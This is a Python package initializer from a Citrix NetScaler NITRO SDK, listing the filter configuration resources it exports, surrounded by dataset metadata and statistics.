nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 2
|
2020-08-24T18:04:22.000Z
|
2020-08-24T18:04:47.000Z
|
nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 1
|
2017-01-20T22:56:58.000Z
|
2017-01-20T22:56:58.000Z
|
nssrc/com/citrix/netscaler/nitro/resource/config/filter/__init__.py
|
benfinke/ns_python
|
d651d7aa01d7dc63c1cd435c7b3314d7f5b26659
|
[
"Apache-2.0"
] | 6
|
2015-04-21T13:14:08.000Z
|
2020-12-03T07:27:52.000Z
|
# Public filter configuration resources exposed by this package
# (same entries, same order, one per line for readable diffs).
__all__ = [
    'filteraction',
    'filterglobal_binding',
    'filterglobal_filterpolicy_binding',
    'filterhtmlinjectionparameter',
    'filterhtmlinjectionvariable',
    'filterpolicy',
    'filterpolicy_binding',
    'filterpolicy_crvserver_binding',
    'filterpolicy_csvserver_binding',
    'filterpolicy_filterglobal_binding',
    'filterpolicy_lbvserver_binding',
    'filterpostbodyinjection',
    'filterprebodyinjection',
]
| 382
| 382
| 0.856021
| 26
| 382
| 11.961538
| 0.461538
| 0.244373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.036649
| 382
| 1
| 382
| 382
| 0.845109
| 0
| 0
| 0
| 0
| 0
| 0.835509
| 0.668407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.